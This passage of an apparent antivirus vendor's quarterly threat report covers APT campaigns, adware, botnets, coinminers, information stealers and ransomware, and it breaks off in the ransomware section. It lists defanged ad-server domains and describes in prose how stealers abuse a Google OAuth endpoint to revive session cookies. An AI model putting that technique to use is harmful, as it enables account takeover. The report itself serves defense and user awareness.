<p>Pakistan’s military was the target of multiple APT groups including groups like Donot and Bitter, signifying the critical importance of military institutions as high-value targets in cyberspace. The attackers employed a combination of spear-phishing as an infection vector, LNK files, and custom backdoors. These attacks underscore the need for heightened cybersecurity measures within military networks, given their attractiveness to a wide range of threat actors.</p>
<h6 class="wp-block-heading">Lebanese Government Entities Under Siege</h6>
<p>The Lebanese government also faced cyber threats, with a threat actor employing a similar range of techniques seen in other attacks, including spear-phishing, LNK files. The infection chain in these attacks was complex, starting with LNK files and moving through various stages including VBScript, BAT files, AutoIT scripts, and eventually leading to the deployment of a custom backdoor. This layered approach to infiltration reflects a strategic methodology designed to evade detection at multiple points, illustrating the lengths to which attackers are willing to go to maintain persistence and control within a targeted network.</p>
<h6 class="wp-block-heading">Gamaredon’s Aggressive Cyber Campaign in Ukraine</h6>
<p>Ukraine has been the target of Gamaredon group’s prolonged and aggressive cyber campaign, marked by a range of intrusive techniques. Their approach includes spear-phishing to gain initial access, followed by the deployment of obfuscated VBScripts and PowerShell scripts, complicating detection efforts. They also use document stealers to illicitly gather sensitive data. Uniquely, the group employs Telegram for disseminating Command and Control (CnC) IPs, a tactic aimed at evading traditional communication surveillance. Further, they spread malware through infected documents and LNK files. In their operations, they also utilize DNS services to acquire IP addresses directly, a technique intended to reduce detection by avoiding the use of domain names. This campaign has resulted in numerous victims, demonstrating Gamaredon’s persistent threat to Ukrainian cybersecurity.</p>
<h6 class="wp-block-heading">Lazarus</h6>
<p>In this quarter, we were monitoring increased activity from the Lazarus group. From our telemetry, it was evident that they continued to utilize ISO files combined with LNK files as an initialization loader for delivering payloads into systems.</p>
<p>In early October, Microsoft observed Lazarus exploiting CVE-2023-42793, a remote-code execution vulnerability impacting various versions of JetBrains, to deploy payloads. Following a successful compromise, they utilized PowerShell to download two payloads from legitimate infrastructure.</p>
<p>We also identified the same toolset being employed to our customers, predominantly those located in Europe.</p>
<p>In December, Cisco Talos reported on a new campaign by Lazarus. In this instance, they were employing a new Dlang-based malware, featuring two Remote Access Trojans (RATs). One of these RATs utilized Telegram bots and channels as a means of communication with the Command-and-Control servers.</p>
<p>This campaign targeted enterprises globally, focusing on those publicly hosting and exposing vulnerable infrastructure to n-day vulnerabilities such as CVE-2021-44228 (Log4j). The sectors primarily under attack included manufacturing, agriculture, and physical security companies.</p>
<p class="has-text-align-right"><em>Luigino Camastra, Malware Researcher</em><br><em>Igor Morgenstern, Malware Researcher</em></p>
<h3 class="wp-block-heading">Adware</h3>
<p><em>Adware is considered unwanted if installed without the user’s consent, tracks browsing behavior, redirects web traffic, or collects personal information for malicious purposes such as identity theft.</em></p>
<p>The rise in popularity of adware can be attributed to its potential for monetization and the dissemination of potentially unwanted programs (PUP) and malware. Moreover, advertisements promoting legal software also employ deceptive adware practices, which verge on the boundaries of scam-like activities. We classify these techniques as annoying and protect our users against this approach. While spreading malware through adware is not the predominant method for infecting victims’ machines overall, our attention in Q4/2023 has been directed toward detecting adware to monitor this potential threat closely.</p>
<p>Adware actors exhibit high flexibility, continuously adjusting their techniques to evade antivirus detection. As a result, it becomes imperative to remain dynamic and consistently adapt to the evolving strategies employed by these actors. The below graph illustrates adware blocks over Q3 and Q4 of 2023. These blocks consist of a diverse array of techniques we actively block and respond to effectively counter the evolving threat of adware – the ongoing cat-and-mouse game.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-1024x404.png" alt="" class="wp-image-7949" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-2023_Q3-Q4_malware_adware-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global Avast risk ratio from adware for Q3/2023 and Q4/2023</figcaption></figure></div>
<p>The global risk ratio of adware in Q4 2023 was similar to the previous quartile. Nevertheless, the prevalence of desktop adware remains significantly elevated. The most affected regions remain South America, Africa, Southeast Asia, and Southeast Europe, as the map below illustrates</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-1024x639.png" alt="" class="wp-image-7976" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-map_2023_Q4_malware_adware-1-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Map showing the global risk ratio for Adware in Q4/2023</figcaption></figure></div>
<h6 class="wp-block-heading">Adware Share</h6>
<p>One of the more sophisticated adware techniques is switching DNS records for ad servers characterized by remarkably short TTL. Therefore, it is impossible to pinpoint the precise strain of adware. The most prevalent DNS records of ad servers in Q4/2023:</p>
<ul>
<li>agriculturalpraise[.]com</li>
<li>formationwallet[.]com</li>
<li>plundertentative[.]com</li>
<li>supportedbushesimpenetrable[.]com</li>
<li>nutsmargaret[.]com</li>
<li>facilitypestilent[.]com</li>
<li>suchbasementdarn[.]com</li>
<li>usetalentedpunk[.]com</li>
</ul>
<p>Consequently, a substantial percentage, 54% of adware strains, falls under the category of unknowns. The remaining shares are distributed among other adware strains in the following manner:</p>
<ul>
<li>SocialBar (38%)</li>
<li>DealPly (2%)</li>
<li>Neoreklami (1%)</li>
</ul>
<p class="has-text-align-right"><em>Martin Chlumecký, Malware Researcher</em></p>
<h3 class="wp-block-heading">Bots</h3>
<p><em>Bots are threats mainly interested in securing long-term access to devices with the aim of utilizing their resources, be it remote control, spam distribution, or denial-of-service (DoS) attacks.</em></p>
<p>In comparison to the previous quarters, this quarter was roller-coaster with many changes in the landscape. The dust hadn’t even settled on Qakbot’s former infrastructure following its FBI takedown in August 2023 before we witnessed its resurgence in December. The number of our users that have been targeted by Qakbot has doubled in Q4 2023 compared to the previous quarter. While this seems to be a significant increase, it is still dwarfed by its activity before the takedown. Its binaries also went through some overhaul, embracing 64-bit architecture and relying on AES instead of XOR for string encryption. Interestingly, a rather new strain Pikabot exhibited overlaps in distribution related TTPs (thread hijacking and second-stage retrieval) with Qakbot and it was, incidentally, also gaining traction in the landscape, doubling the number of affected users compared to the previous quarter.</p>
<p>Phorpiex’s successor, dubbed Twizt, expanded on its payloads this quarter. Aside from spam/sextortion payloads, we’ve seen previously unseen payloads that have featured code for brute-forcing credentials to VNC (remote desktop sharing protocol) endpoints in both local network and randomly generated IP address for potential publicly accessible endpoints.</p>
<p>The overall risk ratio of bots increased at the end of 2023, partially fueled by Qakbot’s resurgence in December. As for other notable changes in the strain prevalence, we’ve seen a huge drop (-48%) in Amadey infections and a steady increase in Emotet (+14%) and Twizt (+27%) infections.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7951" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_bot_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio in Avast’s user base regarding bots in Q4/2023</figcaption></figure></div>
<p>The last mention of bots goes to <em>NoName056(16)</em> and their DDosia project, which had a rather turbulent quarter. Presumably to hinder tracking attempts by malware researchers, the group has reworked their configuration distribution protocol, including its client authentication. Nevertheless, the first implementation was unstable and ridden with software bugs for both server and client implementations. This has dramatically reduced the project’s efficacy in the short term until these blocking issues were resolved. Shortly after the deployment, the authentication protocol was simplified, and the encryption mechanism was changed shortly due to reported problems with client-attribution statistics. These resulted in reduced rewards for the project’s participants.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="443" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-ddosia-attacks-telegram-1024x443.png" alt="" class="wp-image-7952" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-ddosia-attacks-telegram-1024x443.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-ddosia-attacks-telegram-300x130.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-ddosia-attacks-telegram-768x333.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-ddosia-attacks-telegram.png 1344w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">A moving average of DDosia’s cadence of announcements of new victims on their Telegram<br>channel.</figcaption></figure></div>
<p>As for their general operations, there were not many changes. Attacks on various European and Ukrainian banks were attempted throughout the whole quarter. While the first wave of attacks was met with some success, successive attacks rarely succeeded despite the group’s claims on their Telegram channel. The choice of targets still follows the usual <em>modus operandi</em>, meaning that new configurations were usually spurred by various politicians’ statements directed against Russia and their invasion of Ukraine. Unfortunately, the trend reversal in the number of DDosia project participants still holds with the number of participants linearly increasing throughout the quarter to a little over 16,000 participants. This quarter, the most affected TLDs were <em>.cz</em>, <em>.de</em>, and <em>.fr</em>, each having more than 10% of targeted domains.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="496" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-ddosia-members-1024x496.png" alt="" class="wp-image-7953" style="width:766px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-ddosia-members-1024x496.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-ddosia-members-300x145.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-ddosia-members-768x372.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-ddosia-members.png 1220w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Number or participants in the DDosia project</figcaption></figure></div>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="512" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-ddosia-tld-attacks-1024x512.png" alt="" class="wp-image-7954" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-ddosia-tld-attacks-1024x512.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-ddosia-tld-attacks-300x150.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-ddosia-tld-attacks-768x384.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-ddosia-tld-attacks.png 1344w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Share of TLDs targeted by DDosia project</figcaption></figure></div>
<p class="has-text-align-right"><em>Adolf Středa, Malware Researcher</em><br><em>Martin Chlumecký, Malware Researcher</em></p>
<h3 class="wp-block-heading">Coinminers</h3>
<p><em>Coinminers are programs that use a device’s hardware resources to verify cryptocurrency transactions and earn cryptocurrency as compensation. However, in the world of malware, coinminers silently hijack a victim’s computer resources to generate cryptocurrency for an attacker. Regardless of whether a coinminer is legitimate or malware, it’s important to follow our </em><a href="https://support.avast.com/en-eu/article/Threat-Lab-cryptomining-behavior-guideline/" target="_blank" rel="noreferrer noopener"><em>guidelines</em></a><em>.</em></p>
<p>When compared to the previous quarter, we observed another decrease in the prevalence of coinminers in Q4/2023, with the risk ratio dropping by 14%. However, even though it is a rather significant drop, we note that it doesn’t mean coinminers are a lesser threat, unfortunately. This is because we also observed rather significant shift in the market share with a decline in web miners giving way to an extensive rise of XMRig and other executable coinminers which are, in general, more dangerous forms of coinmining.</p>
<p>Geographically, we also observed a shift during Q4/2023 where the attacks were more prevalent in specific countries, lowering the global spread with relations to risk ratio.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1024x639.png" alt="" class="wp-image-7955" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_map_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Map showing global risk ratio for coinminers in Q4/2023</figcaption></figure></div>
<p>First and foremost, we measured two huge increases in risk ratio in United States and Turkey by almost 250% and 200%, respectively. We measure another more significant surge in Hungary, Poland, India, and Egypt were the risk ratio increased by 85%, 52%, 50%, and 40%, respectively. On the other hand, users in France and Belgium were less prone to getting infected with coinminers the risk ratio decreased by 80% and 78%, respectively.</p>
<p>In the graph below, we can observe the numbers skyrocket with regards to risk ratio of getting a coinminers in the United States.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7956" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_US_2023_Q4_malware_coinminer_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Daily risk ratio in our user base in US regarding coinminers in Q4/2023</figcaption></figure></div>
<p>As we mentioned before, this quarter shifted more towards traditional executable coinmining instead of web miners. This resulted in XMRig having a significant dominance of a total 64% malware share with a huge 169% increase this quarter. Web miners lost their malware share by 68%, holding a malware share of 19% which is a long-time lowest.</p>
<p>In general, we denote this as a more dangerous threat opposed to the web miners since XMRig and other executable strains usually run on the background of the whole system, not only on the visited webpage. Furthermore, coinminers tend to be bundled with other malware types as well, meaning the scope of the infection might be even bigger in these cases.</p>
<p>The most common coinminers with their malware share in Q4/2023 were:</p>
<ul>
<li>XMRig (63.69%)</li>
<li>Web miners (19.20%)</li>
<li>CoinBitMiner (2.14%)</li>
<li>SilentCryptoMiner (2.04%)</li>
<li>FakeKMSminer (1.47%)</li>
<li>NeoScrypt (1.20%)</li>
<li>CoinHelper (0.86%)</li>
</ul>
<p class="has-text-align-right"><em>Jan Rubín, Malware Researcher</em></p>
<h3 class="wp-block-heading">Information Stealers</h3>
<p><em>Information stealers are dedicated to stealing anything of value from the victim’s device. Typically, they focus on stored credentials, cryptocurrencies, browser sessions/cookies, browser passwords and private documents.</em></p>
<p>Q4/2023 brought a new and interesting stealing capability which was rapidly adapted by information stealers – abusing Google OAuth endpoint for recovering authentication cookies. <a href="https://www.linkedin.com/posts/alon-gal-utb_an-upcoming-update-to-lumma-infostealer-is-activity-7128433924380213248-hcEG/" target="_blank" rel="noreferrer noopener">Lumma</a> for example, a rapidly rising malware-as-a-service (MaaS) stealer, was supposedly the first to advertise and adapt the technique.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="858" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore-1024x858.png" alt="" class="wp-image-7957" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore-1024x858.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore-300x251.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore-768x643.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore-1536x1286.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/1_Lumma_cookies_restore.png 1600w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Lumma info-stealer changelog (Source: <a href="https://www.bleepingcomputer.com/news/security/malware-dev-says-they-can-revive-expired-google-auth-cookies/" target="_blank" rel="noreferrer noopener">BleepingComputer</a>)</figcaption></figure></div>
<p>Many big information stealer groups, including MaaS players, have already jumped on this new threat. This includes (but is not limited to) Rhadamanthys, Stealc, Meduza, and MetaStealer.</p>
<p>The technique is abusing a Google OAuth “MultiLogin” API endpoint. This endpoint is used for synchronizing accounts across Google services. When the malware decrypts a session token and Gaia ID from the local browser files on the infected device, it is further able to perform a request to the “MultiLogin” API endpoint, recovering the authentication cookie. Note that when this “token and ID” pair is exfiltrated rather than directly used from the victim’s system, the malware authors may use this information on backends instead, trying to avoid AV and EDR monitoring.</p>
<p>Currently, the mitigation is rather limited. According to <a href="https://www.cloudsek.com/blog/compromising-google-accounts-malwares-exploiting-undocumented-oauth2-functionality-for-session-hijacking" target="_blank" rel="noreferrer noopener">CloudSEK</a> researchers, the authentication cookie survives even a (sole) reset of the user’s password. <a href="https://twitter.com/e11i0t_/status/1740791905112490061" target="_blank" rel="noreferrer noopener">In fact</a>, if a user was affected, they need to firstly log out of their Google account to revoke the synchronization OAuth cookie (or sign-out from/kill all active sessions: <a href="http://g.co/mydevices" target="_blank" rel="noreferrer noopener">http://g.co/mydevices</a>), change the password, and log back in.</p>
<p>Unfortunately, these are all reactive steps in a sense that the user needs to know that they were affected. The problem is further underlined by the fact that <a href="https://www.bleepingcomputer.com/news/security/google-malware-abusing-api-is-standard-token-theft-not-an-api-issue/" target="_blank" rel="noreferrer noopener">Google currently doesn’t plan</a> to rework the “MultiLogin” endpoint, or mitigate the API abuse by proactive means.</p>
<h6 class="wp-block-heading"><strong>DNS-based threats</strong></h6>
<p>The Domain Name System (DNS) is a decentralized naming system that translates user-friendly domain names into numerical IP addresses for network devices to identify each other. However, this system is now becoming popular for carrying out attacks. Usually, threat actors misuse DNS for these reasons:</p>
<ul>
<li>The malware can receive commands and instructions, enabling two-way communication</li>
<li>The threat actor can deploy an additional payload onto the infected device</li>
<li>Information stealers can exfiltrate sensitive data from the infected device</li>
<li>The communication is more obfuscated, rendering it more difficult to track properly</li>
<li>The communication is usually enabled by default, since the traffic operates on a common port 53</li>
<li>The traffic may bypass traditional AVs and gateways due to the possible lack of monitoring and scanning</li>
</ul>
<p>Attackers can use many techniques to achieve this, for example performing DNS tunneling, DNS cache poisoning, DNS fast fluxing, or using rogue/malicious DNS servers, to name a few.</p>
<p>We see threat actors adapting DNS-based techniques already, including notorious malware strains. This includes information stealers like <a href="https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/" target="_blank" rel="noreferrer noopener">ViperSoftX</a> or <a href="https://decoded.avast.io/janrubin/meh-2-2/" target="_blank" rel="noreferrer noopener">DarkGate</a> (also known as Meh) for more obfuscated payload delivery, multi-modular backdoor <a href="https://decoded.avast.io/martinchlumecky/dirtymoe-1/" target="_blank" rel="noreferrer noopener">DirtyMoe</a> for obfuscated communication, or <a href="https://decoded.avast.io/danielbenes/crackonosh-a-new-malware-distributed-in-cracked-software/" target="_blank" rel="noreferrer noopener">Crackonosh</a> for its update routine.</p>
<p>For further information about DNS-based threats and how we protect our users against them, read our dedicated <a href="https://decoded.avast.io/threatintel/opening-a-new-front-against-dns-based-threats/" target="_blank" rel="noreferrer noopener">blog post on Decoded</a>.</p>
<h6 class="wp-block-heading"><strong>Statistics</strong></h6>
<p>In Q4/2023, we observed a 6% increase in information stealer activity in comparison with the previous quarter. This increase is mostly due to  the rise of Lumma stealer as well as Stealc and by an increase in activity of various online JavaScript scrapers.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7959" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/2_daily_hits_normalized_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Daily risk ratio in our user base regarding information stealers in Q4/2023</figcaption></figure></div>
<p>The highest risk of information stealer infections currently exists in:</p>
<ul>
<li>Turkey (3.01%) with 46% Q/Q increase</li>
<li>Pakistan (2.32%) with 6% Q/Q decrease</li>
<li>Egypt (1.98%) with 3% Q/Q increase</li>
</ul>
<p>Thankfully, we observed a significant 12% decrease of information stealers’ activity in the United States.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1024x639.png" alt="" class="wp-image-7958" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Map showing global risk ratio for information stealers in Q4/2023</figcaption></figure></div>
<p>Unsurprisingly, AgentTesla still holds its place  as the most popular information stealer, capturing 26% of the global information stealers market share. However, this malware share is lower when compared to the previous quarter due to the 11% decrease. Formbook also experienced a decrease in market share by 10%, having 10% market share now. Unfortunately, various JavaScript scrapers/exfilware were also far more active this quarter, marking 6.08% market share now.</p>
<p>According to our data, Raccoon stealer had another rough couple of months, losing its market share by additional 21%, for a current total of 1.54% market share.</p>
<p>The most common information stealers with their malware shares in Q4/2023 were:</p>
<ul>
<li>AgentTesla (26%)</li>
<li>FormBook (10%)</li>
<li>Fareit (6%)</li>
<li>RedLine (4%)</li>
<li>Lokibot (3%)</li>
<li>Lumma (3%)</li>
<li>Stealc (2%)</li>
<li>OutSteel (2%)</li>
<li>ViperSoftX (2%)</li>
<li>Raccoon (2%)</li>
</ul>
<p class="has-text-align-right"><em>Jan Rubín, Malware Researcher</em></p>
<h3 class="wp-block-heading">Ransomware </h3>
<p><em>Ransomware is any type of extorting malware. The most common subtype is the one that encrypts documents, photos, videos, databases, and other files on the victim’s PC. Those files become unusable without decrypting them first. To decrypt the files, attackers demand money, “ransom”, hence the term ransomware.</em></p>
<p>Hacks, breaches, stolen data. Almost every day, <a href="https://www.bleepingcomputer.com/tag/ransomware/" target="_blank" rel="noreferrer noopener">we can read about a new data breach</a> or data extortion campaign from one of the many ransomware gangs. The intensity and frequency are stunning; for example, the LockBit data leak site showed 65 new attacked companies in 15 days (from Oct 23 to Nov 7, 2023). That is more than 4 new companies attacked each day!</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="726" height="259" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/001-ransomware-lockbit-victims-15-days.png" alt="" class="wp-image-7960" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/001-ransomware-lockbit-victims-15-days.png 726w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/001-ransomware-lockbit-victims-15-days-300x107.png 300w" sizes="(max-width: 726px) 100vw, 726px" /><figcaption class="wp-element-caption">List of companies attacked by LockBit in 15 days (Oct 23-Nov 7, 2023)</figcaption></figure></div>
<p>As of the time of writing this article, the site lists 217 companies that were allegedly attacked, which makes LockBit the most active ransomware gang worldwide.</p>
<p>However, law enforcement organizations do not sleep either. In a joint operation, the Dutch Police and Cisco Talos recovered a <a href="https://blog.talosintelligence.com/decryptor-babuk-tortilla/" target="_blank" rel="noreferrer noopener">decryption tool</a> of the Babuk ransomware used in the <a href="https://twitter.com/VirITeXplorer/status/1448689555083780101" target="_blank" rel="noreferrer noopener">Tortilla malicious campaign</a>. Avast added the recovered private key into its Babuk decryptor, which is now <a href="https://decoded.avast.io/threatresearch/avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police/" target="_blank" rel="noreferrer noopener">available for download</a>.</p>
<p>Furthermore, several ransomware operations were disrupted in the previous quarter, such as BlackCat / ALPHV, which is the world’s second most active gang.</p>
<p>On Dec 7, 2023, <a href="https://twitter.com/malwrhunterteam/status/1732705297452405033" target="_blank" rel="noreferrer noopener">information</a> appeared that BlackCat’s leak site is down. Even though BlackCat operators looked like they were repairing the site, one day later, it appeared that the FBI was <a href="https://twitter.com/evangeorgevoug/status/1733016196717629571" target="_blank" rel="noreferrer noopener">behind the outage</a> of the data site:</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="818" height="802" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/003-ransomware-blackcat-down-due-to-an-FBI-visit.png" alt="" class="wp-image-7961" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/003-ransomware-blackcat-down-due-to-an-FBI-visit.png 818w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/003-ransomware-blackcat-down-due-to-an-FBI-visit-300x294.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/003-ransomware-blackcat-down-due-to-an-FBI-visit-768x753.png 768w" sizes="(max-width: 818px) 100vw, 818px" /><figcaption class="wp-element-caption">Tweet informing about possible FBI operation on BlackCat gang</figcaption></figure></div>
<p>Ten days later, the Department of Justice officially confirmed that the <a href="https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant" target="_blank" rel="noreferrer noopener">ransomware gang operation was disrupted</a>, and the site was seized. The leak site now shows information about successful law enforcement operation done by the FBI:</p>
<div class="wp-block-image">
